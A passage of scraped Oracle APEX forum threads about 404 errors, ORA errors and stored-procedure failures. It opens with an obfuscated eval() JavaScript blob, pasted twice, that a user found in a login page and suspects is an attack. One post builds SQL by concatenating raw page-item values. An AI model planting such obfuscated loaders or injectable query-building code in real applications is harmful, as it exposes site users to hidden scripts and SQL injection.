    eval(function(a){var b=a.split("");var d=b.length;var c=parseInt(b[0]+b[1],16);var f=String.fromCharCode(c);for(var e=2;e<d;e++){var g=(parseInt(b[e]+b[e+1],16)-c)%256;c=g;f+=String.fromCharCode(g);e++}return f}("288edbe3d1d7ddd8dd968d91908da4f1d7d39283a0a3c7cddfd8a0b1d7d392829fa3dbe3d1d7ddd8dd969495a4f1d7d3928daaa9a7a4cf8e958e5eabe3e1d8924c938e5e5f444ba4e4cf8e909095964f4c8d8f95964f4c4e555e6e7aaa9b97d7d2c9ddc7b58e8d904d5f5f4d8f8d5252a4f1d7d3928ba8aa9b97d7d2c9ddc7b58e4a45454b64a4cf8e938c5e6a5e5aa4e7dbd2c4cdcbd1d7cba3aa9ba1e8d7d5e7e69a939464a8aaaa9ba1e8d7d5e7e69a585c9794a6f3d7d3928aa7aa9b97d7d2c9ddc7b58e4a61614b64a4cf8e92a77a6a5e574c918c5e6a5e5aa4edd7d9e9e7e08e8ce9e6cf8e928b5e6a5e5aa4e8aaaa9ba0d7d5dccdc4c88d578bcf9d4e535b4e444b64a4cf8e959ba1d8c6d3d5cb90578b9b635358667a6a5e5aa4e898685f48489ffae2d1dfd8e0e898685f61619fea9868a2904d5f5f4d8f9fa4cf8e938c5e6a5e5aa4e89868a9dbd2c4cdcbd1d7cbe3fafaefd7d9e9e7e08e8deab8b1d7d39289a6a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7a3dbe3d1d7ddd8dd96969a9895a4f1d7d3928daaa1d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d969764a1d5e19a9ed7d3928ba86d6ba6a7a99b9ad1d3d5dbdca3a6965654a4efe6ebf4f1d7d3928facaac8c6c88b97d7dcd3d7ba9ca19987b1d7d39291ae9f8a95c8c6c88b95ccd9b5b5e8e6dbcbd7e9d98d94985e5b5264a4cf8e99925eabe3e1d8924c97925e5f444ba4e8c8c6c88ba1d8d9b5b5e8e6dbcbd7e9d98d94989d9a64a4cf8e95c8c6c88b97d7dcd3d7ba9ca1996d5eac98a4e8c8c6c88b97d7dcd3d7ba9ca19989acecfafae0c4d5d7cb909899a4f8fafab8a5924a83834e4e8adad7cb884b64a18e51a6b8b1d7d39287a4a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4f1d7d39290adb4e0d7d2d3e6a592d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaab1d7d3928ca95f4f4f5dafe6ebf4e7a9ad9e96d7e2e7afa4cf8e498d95a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2e2e6cf8e949a9bced5d7cb90576996c08f4f535852a4f1d7d3928eabb4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2a0a4cf8e498f9c9bced5d7cb90576996c08f4f535852a4e7a9a99aa0d7d5dccdc4c88d576996c08f4f535b4e444ba6fafae0c4d5d7cb909596a4f8efd7d9e9e7e08e8ce9b8add7d9e9e7e0969ce6e7da8b4c9de0d7d2d3e69d4c9de0d7d2d3e6a59adbd2c4d5ddd8dd944c9de0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28b4c90929394667a7ab4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28ea6b8b1d7d39288a5a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3c7cddfd8a0a4cf8e9399a1e8d7d5e7e6dbd7d58f585c605d667a5f8adce8e4929ef8e799a1e8d7d5e7e6dbd7d58f585c5d5a667a5f51519ef8e79997d7d2c9ddc7b58e4a5c5c4b667a6a5e5aa4e5a7b1e6e7dae2efd7d9e9e7e08e8ae7b8b1d7d392819ea3dbe3d1d7ddd8dd969596a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4e4cf8e578dbad3a265695da2d9d8e79c9798667a7aa3c7cddfd88ea4f1d7d39290ada1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaaaaacad9e96dad7cbe3efd7d9e9e7e08e8fecb8a4cf8e498ee9f8f0ede9d5d4d5868d9b93d1d1d2d2d3e2e7b07a5f97e3d2c9cbcfd7d3c9864ba4edd7d9e9e7e0ebf3d7d3928ca965959b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd8f5eabe3e1d89568ac9b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd9ca4d7cde1da9f5c445dafe6ebf4e79a9bced5d7cb90575d5d58a6e0c4d5d7cb909697a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e6cf8e50498d95a5f8a494a97a7aabe3e1d895a5f8a494a97a7ab2e3d2c9cbcfd7d3c98da5f8a4949a9bced5d7cb90578dbacf9d4e53585252a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e9a9a792949564a4cf8e909094954f4c8d8f94954f4c4e49848c52a4f1d7d3928ba8a1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a8bd7dee5e9964b64a699a2ede9d5a25f8ad1cdc8c9d3905da6999ccfced2a2a2a0a699a4d7cde1daa2a19fa89b8fd1e0d5d3d2a7abd1d5d08c9394a6fab8b1d7d39286a3a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7b4e0d7d2d3e6a592d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d4a88d5e1df8f4b64a1d5e19a9ed7d3928ba86d6ba6a7a6989ad1d3d5dbdca3a6965654a4dc8992c5c6c886a6e0a0b1e6e7dae2b8a4cf8e494298e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79ba4f2e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79a4a8edbd0c5864e959592c7cddfd88ea6e2d1dfd8e0e4cf8e494298e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29da4f2e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29c4a91dddadbd0c5864e9592a6e2d1dfd8e0f2e0d7d2d3e6a59ddddadbd0c5a1a6e6fafaa65198de9a9ce69f64"));
    </script>
    <title>Bienvenido</title>
    HERE i Found the var pn with CSRT Value, so it is the problem,
    the HTML code generate for the same page from the domain b is the next:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html lang="es-mx" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head>
    <title>Bienvenido</title>
    Here between <head> tag and <title> tag is empty and it works fine, do you think that it could be and attack to domain a?
    if I try to access the developer environment from domain a the code of the login page is
    <!DOCTYPE html>
    <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head><script language="JavaScript">var pn = "CSRT"; var pv = '3921513832723665401';
    eval(function(a){var b=a.split("");var d=b.length;var c=parseInt(b[0]+b[1],16);var f=String.fromCharCode(c);for(var e=2;e<d;e++){var g=(parseInt(b[e]+b[e+1],16)-c)%256;c=g;f+=String.fromCharCode(g);e++}return f}("288edbe3d1d7ddd8dd968d91908da4f1d7d39283a0a3c7cddfd8a0b1d7d392829fa3dbe3d1d7ddd8dd969495a4f1d7d3928daaa9a7a4cf8e958e5eabe3e1d8924c938e5e5f444ba4e4cf8e909095964f4c8d8f95964f4c4e555e6e7aaa9b97d7d2c9ddc7b58e8d904d5f5f4d8f8d5252a4f1d7d3928ba8aa9b97d7d2c9ddc7b58e4a45454b64a4cf8e938c5e6a5e5aa4e7dbd2c4cdcbd1d7cba3aa9ba1e8d7d5e7e69a939464a8aaaa9ba1e8d7d5e7e69a585c9794a6f3d7d3928aa7aa9b97d7d2c9ddc7b58e4a61614b64a4cf8e92a77a6a5e574c918c5e6a5e5aa4edd7d9e9e7e08e8ce9e6cf8e928b5e6a5e5aa4e8aaaa9ba0d7d5dccdc4c88d578bcf9d4e535b4e444b64a4cf8e959ba1d8c6d3d5cb90578b9b635358667a6a5e5aa4e898685f48489ffae2d1dfd8e0e898685f61619fea9868a2904d5f5f4d8f9fa4cf8e938c5e6a5e5aa4e89868a9dbd2c4cdcbd1d7cbe3fafaefd7d9e9e7e08e8deab8b1d7d39289a6a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7a3dbe3d1d7ddd8dd96969a9895a4f1d7d3928daaa1d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d969764a1d5e19a9ed7d3928ba86d6ba6a7a99b9ad1d3d5dbdca3a6965654a4efe6ebf4f1d7d3928facaac8c6c88b97d7dcd3d7ba9ca19987b1d7d39291ae9f8a95c8c6c88b95ccd9b5b5e8e6dbcbd7e9d98d94985e5b5264a4cf8e99925eabe3e1d8924c97925e5f444ba4e8c8c6c88ba1d8d9b5b5e8e6dbcbd7e9d98d94989d9a64a4cf8e95c8c6c88b97d7dcd3d7ba9ca1996d5eac98a4e8c8c6c88b97d7dcd3d7ba9ca19989acecfafae0c4d5d7cb909899a4f8fafab8a5924a83834e4e8adad7cb884b64a18e51a6b8b1d7d39287a4a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4f1d7d39290adb4e0d7d2d3e6a592d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaab1d7d3928ca95f4f4f5dafe6ebf4e7a9ad9e96d7e2e7afa4cf8e498d95a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2e2e6cf8e949a9bced5d7cb90576996c08f4f535852a4f1d7d3928eabb4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2a0a4cf8e498f9c9bced5d7cb90576996c08f4f535852a4e7a9a99aa0d7d5dccdc4c88d576996c08f4f535b4e444ba6fafae0c4d5d7cb909596a4f8efd7d9e9e7e08e8ce9b8add7d9e9e7e0969ce6e7da8b4c9de0d7d2d3e69d4c9de0d7d2d3e6a59adbd2c4d5ddd8dd944c9de0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28b4c90929394667a7ab4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28ea6b8b1d7d39288a5a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3c7cddfd8a0a4cf8e9399a1e8d7d5e7e6dbd7d58f585c605d667a5f8adce8e4929ef8e799a1e8d7d5e7e6dbd7d58f585c5d5a667a5f51519ef8e79997d7d2c9ddc7b58e4a5c5c4b667a6a5e5aa4e5a7b1e6e7dae2efd7d9e9e7e08e8ae7b8b1d7d392819ea3dbe3d1d7ddd8dd969596a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4e4cf8e578dbad3a265695da2d9d8e79c9798667a7aa3c7cddfd88ea4f1d7d39290ada1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaaaaacad9e96dad7cbe3efd7d9e9e7e08e8fecb8a4cf8e498ee9f8f0ede9d5d4d5868d9b93d1d1d2d2d3e2e7b07a5f97e3d2c9cbcfd7d3c9864ba4edd7d9e9e7e0ebf3d7d3928ca965959b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd8f5eabe3e1d89568ac9b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd9ca4d7cde1da9f5c445dafe6ebf4e79a9bced5d7cb90575d5d58a6e0c4d5d7cb909697a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e6cf8e50498d95a5f8a494a97a7aabe3e1d895a5f8a494a97a7ab2e3d2c9cbcfd7d3c98da5f8a4949a9bced5d7cb90578dbacf9d4e53585252a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e9a9a792949564a4cf8e909094954f4c8d8f94954f4c4e49848c52a4f1d7d3928ba8a1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a8bd7dee5e9964b64a699a2ede9d5a25f8ad1cdc8c9d3905da6999ccfced2a2a2a0a699a4d7cde1daa2a19fa89b8fd1e0d5d3d2a7abd1d5d08c9394a6fab8b1d7d39286a3a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7b4e0d7d2d3e6a592d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d4a88d5e1df8f4b64a1d5e19a9ed7d3928ba86d6ba6a7a6989ad1d3d5dbdca3a6965654a4dc8992c5c6c886a6e0a0b1e6e7dae2b8a4cf8e494298e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79ba4f2e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79a4a8edbd0c5864e959592c7cddfd88ea6e2d1dfd8e0e4cf8e494298e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29da4f2e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29c4a91dddadbd0c5864e9592a6e2d1dfd8e0f2e0d7d2d3e6a59ddddadbd0c5a1a6e6fafaa65198de9a9ce69f64"));
    </script>
    and obviously i Can't access
    Please help me...
    tx in advance

  • Not found - The requested URL /apex/wwv_flow.show was not found on this ser

    I have a very simple anonymous block (see below) which I am using to test an area of the database I am developing using OE and APEX. Sometimes the block works and other times it fails with the following error message------
    Not found - The requested URL /apex/wwv_flow.show was not found on this server
    Before the error message is displayed a pop-up window appears with a submit button ( the heading on the window contains --- Enter Bind Variables - windows internet explorer), which I do not understand.
    Is the problem I am experiencing due to some memory limitation ? or do I have a corrupt oracle system (everything else appears OK though).
    Any help or advice would be much appreciated.
    Best Regards
    Lawrence Cattell
    Here is the anonymous block (please no comments on the code). If I extend the number of DBMS_OUTPUT.PUT_LINES beyond the current number of 3 it fails everytime, sometimes it works with 3, sometimes it fails. Is it related to the number of variables I am binding to the WSI_QUOTE Type ?
    DECLARE
    v_dir VARCHAR2(20):='WSI_REPORTS';
    V_COUNT NUMBER(2,0);
    V_QTE_REF_NBR WSI_QUOTES.QTE_REF_NBR%TYPE;
    V_CTR_ID WSI_QUOTES.CTR_ID%TYPE;
    v_QTE_REC_NBR WSI_QUOTES.QTE_REC_NBR%TYPE;
    v_QTE_DTE WSI_QUOTES.QTE_DTE%TYPE;
    V_PEB_NBR WSI_QUOTES.PEB_NBR%TYPE;
    V_QTE_COM WSI_QUOTES.QTE_COM%TYPE;
    V_SAI_NBR_01 WSI_QUOTES.SAI_NBR_01%TYPE;
    V_QTY_01 WSI_QUOTES.QTY_01%TYPE;
    V_SAI_NBR_02 WSI_QUOTES.SAI_NBR_02%TYPE;
    V_QTY_02 WSI_QUOTES.QTY_02%TYPE;
    V_SAI_NBR_03 WSI_QUOTES.SAI_NBR_03%TYPE;
    V_QTY_03 WSI_QUOTES.QTY_03%TYPE;
    V_SAI_NBR_04 WSI_QUOTES.SAI_NBR_04%TYPE;
    V_QTY_04 WSI_QUOTES.QTY_04%TYPE;
    V_SAI_NBR_05 WSI_QUOTES.SAI_NBR_05%TYPE;
    V_QTY_05 WSI_QUOTES.QTY_05%TYPE;
    V_SAI_NBR_06 WSI_QUOTES.SAI_NBR_06%TYPE;
    V_QTY_06 WSI_QUOTES.QTY_06%TYPE;
    V_SAI_NBR_07 WSI_QUOTES.SAI_NBR_07%TYPE;
    V_QTY_07 WSI_QUOTES.QTY_07%TYPE;
    V_SAI_NBR_08 WSI_QUOTES.SAI_NBR_08%TYPE;
    V_QTY_08 WSI_QUOTES.QTY_08%TYPE;
    V_SAI_NBR_09 WSI_QUOTES.SAI_NBR_09%TYPE;
    V_QTY_09 WSI_QUOTES.QTY_09%TYPE;
    V_SAI_NBR_10 WSI_QUOTES.SAI_NBR_10%TYPE;
    V_QTY_10 WSI_QUOTES.QTY_10%TYPE;
    V_CTR_NME WSI_CUSTOMERS.CTR_NME%TYPE;
    CURSOR GET_QUOTE_INFO_CUR IS
    SELECT *FROM WSI_QUOTES WHERE QTE_REC_NBR = 2;
    BEGIN
    DELETE WSI_QUOTE_TEMP_HOLD;
    OPEN GET_QUOTE_INFO_CUR;
    LOOP
    FETCH GET_QUOTE_INFO_CUR INTO V_QTE_REC_NBR,V_QTE_REF_NBR,V_CTR_ID,v_QTE_DTE,V_PEB_NBR, V_SAI_NBR_01,V_QTY_01,V_SAI_NBR_02,V_QTY_02,V_SAI_NBR_03, V_QTY_03,
    V_SAI_NBR_04, V_QTY_04, V_SAI_NBR_05, V_QTY_05,V_SAI_NBR_06, V_QTY_06,V_SAI_NBR_07,V_QTY_07,V_SAI_NBR_08, V_QTY_08, V_SAI_NBR_09, V_QTY_09,
    V_SAI_NBR_10,V_QTY_10,V_QTE_COM;
    EXIT WHEN GET_QUOTE_INFO_CUR%NOTFOUND;
    SELECT CTR_NME INTO v_CTR_NME FROM WSI_CUSTOMERS WHERE CTR_ID = V_CTR_ID;
    END LOOP;
    CLOSE GET_QUOTE_INFO_CUR;
    V_COUNT :=1;
    DBMS_OUTPUT.PUT_LINE(v_QTE_REF_NBR|| '***' ||v_CTR_ID|| '***' ||V_CTR_NME|| '***' ||V_peb_NBR|| '***' ||V_SAI_NBR_01|| '***' ||V_QTY_01);
    DBMS_OUTPUT.PUT_LINE(v_QTE_REF_NBR|| '***' ||v_CTR_ID|| '***' ||V_CTR_NME|| '***' ||V_peb_NBR|| '***' ||V_SAI_NBR_02|| '***' ||V_QTY_02);
    DBMS_OUTPUT.PUT_LINE(v_QTE_REF_NBR|| '***' ||v_CTR_ID|| '***' ||V_CTR_NME|| '***' ||V_peb_NBR|| '***' ||V_SAI_NBR_03|| '***' ||V_QTY_03);
    END;

    The interpreter could be choking on the "*from" (no space before "from") might not be parsing the SQL as intended .
    The "Enter Bind Variables" dialog box is coming from something undefined, I'd suggest putting that block into an .sql file and run it via sqlplus.
    To demonstrate how a bind variable is handled try setting up a file with:
    select * from sometablename where somecolname = &somekeyval;
    -- or '&somekeyval' if its varchar2When you connect with sqlplus and run that file it will prompt for the value to use for "somekeyval".
    Only other thing is to ensure the "select * ..." has the same column names and in the same order as expected by the fetch, perhaps the table layout has changed and you could be getting an added column or maybe missing one at the end of the list.
    If you try running that block in a sqlplus session enable serveroutput to see the dbms_out result (set serveroutput on size 50000)

  • The requested URL /pls/apex/wwv_flow.accept was not found

    So I went in today to add a new form to an application and here is what I get....
    Any new ITEM I make, I can not make any changes to without getting the error. Blank page, blank region, standard form item, nothing else on page, everything set to default.
    Any new pages / regions all work fine.
    Any old pages / regions all work fine.
    If I even just create an item, go back into it and hit apply, I get the "The requested URL /pls/apex/wwv_flow.accept was not found"
    Anyone?

    apex version? listener version?
    web server? version?
    DB version?  are you on RAC?
    (why do people leave these important pieces of information out???)
    personally, if a web site works one minute then fails the next with said error, you have a DNS problem.
    either too many entries in the DNS ... or two computers with the same IP address.
    when the error page displays, double check that the URL is for the correct host and port (eg not localhost)
    MK

  • /pls/htmldb/form_top_bg.png HTTP-404 procedure doesn't exist

    Getting this consistently in the apache error log -
    [Wed Jul 18 13:10:00 2007] [error] [client 10.10.11.135] [ecid: 1184782200:192.168.1.221:3219:0:6251,0] mod_plsql: /pls/htmldb/form_top_bg.png HTTP-404 \nform_top_bg.png: PROCEDURE DOESN'T EXIST\n
    Any ideas? I've verified that this file does exist in the correct location.

    I've verified that this file does exist in the correct location. What is the correct location? Is /pls/htmldb a virtual directory or your DAD location? Is the file in the images directory?
    Somewhere there is a reference to "form_top_bg.png" and it should probably be changed to include the image prefix tag. i.e. src="#IMAGE_PREFIX#form_top_bg.png"

  • HTTP-404 ORA-06502  .. in APEX_030200.F

    Hello all,
    I randomly this Error: Page not found HTTP 404.
    In Logfile mod_plsql.log :
    [Thu Sep 17 13:43:38 2009] [error] [client 149.246.141.40] [ecid: 1253187818:149.246.166.230:2868:2432:1046,0] mod_plsql: /pls/htmldb/f HTTP-404 ORA-06502: PL/SQL: numerischer oder Wertefehler: Zeichenfolgenpuffer zu klein\nORA-06512: in "APEX_030200.F", Zeile 279\nORA-06512: in Zeile 23\n
    Once this Error occurs, occasionally export and reimport works, if not I have to go back to a running version.
    Unfortunately, this happens not to page I made changes on, the error occures on a other Page containing an interactive report.
    Does anybody else has this problem ? I searched the Forum, but the similiar Posts are with DB-Version 9.x.., I'm using 10.2.
    Any help is appreciated.
    Heinz

    thanks, i checked bug#4015165. that looks like it is the reason for my problems. (as stated the problems started with the upgrade on 9.2.0.6)
    unfortunally there is no patch for windows available until now.
    how does flushing the shared_pool influences the described behaviour? (i cannot try this before next week ... holidays)
    does anybody know if there are other workarounds?

  • ORA-06550: line 5, column 57: PLS-00103: Encountered the symbol "F01_" when

    Hello,
    I wanted to use the APEX_ITEM.DISPLAY_AND_SAVE
    Here is my query:
    DECLARE
    QUERY VARCHAR2 (2000);
    BEGIN
    QUERY := 'SELECT '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(1,REGISTRATION_ID,'f01_'||ROWNUM, NULL) REGISTRATION_ID, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(2,STATUS,'f02_'||ROWNUM, NULL) STATUS, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(3,CALL_CODE,'f03_'||ROWNUM, NULL) CALL_CODE, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(4,PARTNER_USER_ID,'f04_'||ROWNUM, NULL) PARTNER_USER_ID,'
    ||'APEX_ITEM.DISPLAY_AND_SAVE(5,COORDINATOR_USER_ID,'f05_'||ROWNUM, NULL) COORDINATOR_USER_ID, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(6,COORDINATOR_EMAIL,'f06_'||ROWNUM, NULL) COORDINATOR_EMAIL, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(7,COORDINATOR_FINAUTH_EMAIL,'f07_'||ROWNUM, NULL) COORDINATOR_FINAUTH_EMAIL,'
    ||'APEX_ITEM.DISPLAY_AND_SAVE(8,COORDINATOR_FULL_ADDRESS,'f08_'||ROWNUM, NULL) COORDINATOR_FULL_ADDRESS, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(9,COORDINATOR_NAME,'f09_'||ROWNUM, NULL) COORDINATOR_NAME, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(10,COORDINATOR_FAX,'f10_'||ROWNUM, NULL) COORDINATOR_FAX,'
    ||'APEX_ITEM.DISPLAY_AND_SAVE(11,COORDINATOR_TEL,'f11_'||ROWNUM, NULL) COORDINATOR_TEL, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(12,COORDINATOR_COUNTRY,'f12_'||ROWNUM, NULL) COORDINATOR_COUNTRY, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(13,COORDINATOR_COMPANY_NAME,'f13_'||ROWNUM, NULL) COORDINATOR_COMPANY_NAME,'
    ||'APEX_ITEM.DISPLAY_AND_SAVE(14,DATE_LETTER_SENT,'f14_'||ROWNUM, NULL) DATE_LETTER_SENT, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(15,DATE_LAST_SUBMISSION,'f15_'||ROWNUM, NULL) DATE_LAST_SUBMISSION, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(16,PROPOSAL_ACRONYM,'f16_'||ROWNUM, NULL) PROPOSAL_ACRONYM,'
    ||'APEX_ITEM.DISPLAY_AND_SAVE(17,INSTRUMENT_CODE,'f17_'||ROWNUM, NULL) INSTRUMENT_CODE, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(18,TITLE,'f18_'||ROWNUM, NULL) TITLE, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(19,SUBMITTED,'f19_'||ROWNUM, NULL) SUBMITTED, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(20,PREPARATION,'f20_'||ROWNUM, NULL) PREPARATION, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(21,PASS_BY_MAIL,'f21_'||ROWNUM, NULL) PASS_BY_MAIL,'
    ||'APEX_ITEM.DISPLAY_AND_SAVE(22,PROPOSAL_ID,'f22_'||ROWNUM, NULL) PROPOSAL_ID, '
    ||'APEX_ITEM.DISPLAY_AND_SAVE(23,PROPOSAL_NUMBER,'f23_'||ROWNUM, NULL) PROPOSAL_NUMBER '
    ||' FROM SUZANREGISTRATIONVIEW '
    ||' where 1 = 1 ';
    IF LENGTH (V ('P4_REGISTRATION_ID')) > 0
    THEN
    QUERY :=
    QUERY || ' and REGISTRATION_ID like ' || V ('P4_REGISTRATION_ID');
    ELSE
    QUERY := QUERY || '';
    END IF;
    IF LENGTH (V ('P4_CALL_CODE')) > 0
    THEN
    QUERY := QUERY || ' and CALL_CODE like ''' || V ('P4_CALL_CODE') || '''';
    ELSE
    QUERY := QUERY || '';
    END IF;
    IF LENGTH (V ('P4_COORDINATOR_USER_ID')) > 0
    THEN
    QUERY :=
    QUERY
    || ' and (upper(COORDINATOR_USER_ID)) like (upper('''
    || V ('P4_COORDINATOR_USER_ID')
    || '''))';
    ELSE
    QUERY := QUERY || '';
    END IF;
    IF LENGTH (V ('P4_COORDINATOR_FINAUTH_EMAIL')) > 0
    THEN
    QUERY :=
    QUERY
    || ' and (upper(R.COORDINATOR_EMAIL)) like (upper('''
    || V ('P4_COORDINATOR_FINAUTH_EMAIL')
    || '''))';
    ELSE
    QUERY := QUERY || '';
    END IF;
    IF LENGTH (V ('P4_COORDINATOR_NAME')) > 0
    THEN
    QUERY :=
    QUERY
    || ' and upper(COORDINATOR_NAME) like (upper('''
    || V ('P4_COORDINATOR_NAME')
    || '''))';
    ELSE
    QUERY := QUERY || '';
    END IF;
    IF LENGTH (V ('P4_COORDINATOR_COMPANY_NAME')) > 0
    THEN
    QUERY :=
    QUERY
    || ' and (upper(COORDINATOR_COMPANY_NAME)) like (upper('''
    || V ('P4_COORDINATOR_COMPANY_NAME')
    || '''))';
    ELSE
    QUERY := QUERY || '';
    END IF;
    IF LENGTH (V ('P4_PARTNER_USER_ID')) > 0
    THEN
    QUERY :=
    QUERY
    || ' and (upper(PARTNER_USER_ID)) like (upper('''
    || V ('P4_PARTNER_USER_ID')
    || '''))';
    ELSE
    QUERY := QUERY || '';
    END IF;
    IF LENGTH (V ('P4_PROPOSAL_ACRONYM')) > 0
    THEN
    QUERY :=
    QUERY
    || ' and (upper(proposal_acronym)) like (upper('''
    || V ('P4_PROPOSAL_ACRONYM')
    || '''))';
    ELSE
    QUERY := QUERY || '';
    END IF;
    RETURN QUERY;
    END;
    And here is the error encountered:
    1 error has occurred
    * Function returning SQL query: Query cannot be parsed within the Builder. If you believe your query is syntactically correct, check the generic columns checkbox below the region source to proceed without parsing.
    (ORA-06550: line 5, column 57: PLS-00103: Encountered the symbol "F01_" when expecting one of the following: * & = - + ; < / > at in is mod remainder not rem <> or != or ~= >= <= <> and or like LIKE2_ LIKE4_ LIKEC_ between || member SUBMULTISET_)
    I don't understand why the engine returns an error at that point.
    Despite the fact that I follow the user guide and the Denes Kubicek's sample examples, I still have that error.
    If I remove the part 'f01_' || and only keep the rownum, the problem is solved.
    Do you have any idea ?
    Thanks in advance for your answers.
    Regards,
    Stessy Delcroix

    HI MickyWay,
    So simple. :-)
    Problem solved.
    Thanks a lot (merci beaucoup)

  • JDBC receiver error:ORA-06550: line 1, column 7: PL/SQL

    Hi,
    I am geting this error in JDBC Receiver adapter. when  i call the stored procedure.
    Last week it works fine.But i today i faced this error.
    Error Unable to execute statement for table or stored procedure. 'spec_utilities.SP_DELETE(Structure 'unassign') due to java.sql.SQLException: ORA-06550: line 1, column 7: PLS-00201: identifier 'SPEC_UTILITIES.SP_DELETE' must be declared ORA-06550: line 1, column 7: PL/SQL: Statement ignored 
    Error JDBC message processing failed; reason Error processing request in sax parser: Error when executing statement for table/stored proc. 'spec_utilities.SP_DELETE(structure 'unassign'): java.sql.SQLException: ORA-06550: line 1, column 7: PLS-00201: identifier 'SPEC_UTILITIES.SP_DELETE' must be declared ORA-06550: line 1, column 7: PL/SQL: Statement ignored 
    Error MP: Exception caught with cause com.sap.aii.af.ra.ms.api.RecoverableException: Error processing request in sax parser: Error when executing statement for table/stored proc. 'spec_utilities.SP_DELETE (structure 'unassign'): java.sql.SQLException: ORA-06550: line 1, column 7: PLS-00201: identifier 'SPEC_UTILITIES.SP_DELETE'must be declared ORA-06550: line 1, column 7: PL/SQL: Statement ignored 
    My stored procedure structure is:
    <unassign>
    <SP_DELETE action="EXECUTE">
      <table>spec_utilities.SP_DELETE</table>
      <PAE isInput="true" type="VARCHAR">447848</pAEIC>
      <SKEY isInput="true" type="NUMERIC">4548545</pSKEY>
      <USER isOutput="true" type="VARCHAR" />
      <UNIT  isOutput="true" type="VARCHAR" />
      <EMAIL isOutput="true" type="VARCHAR" />
      </SP_DELETE>
      </unassign>
    Can you suggest me where is this error.
    Thank you
    Sateesh

    Hi,
       if it was executing fine earlier then check the below
    1. user permissions level at the database..whether it has access to the required SP or not..
    2. Check if there was any change in the SP..which has not been communicated...
    HTH
    Rajesh

  • Oracle Error: SQL Error Messge: [SERVERERROR] ORA-06550: line 1, column 7:

    The following is the error msg, I am trying to run the stored procedure to insert data into few tables.
    Pls suggest any solution to this error msg: Thanks.
    08/05/2005 11:27:41-> Level:1, UpLoader: SQL Error Messge: [SERVERERROR] ORA-06550: line 1, column 7:
    PLS-00306: wrong number or types of arguments in call to 'ENTPRFMAN'
    ORA-06550: line 1, column 7:
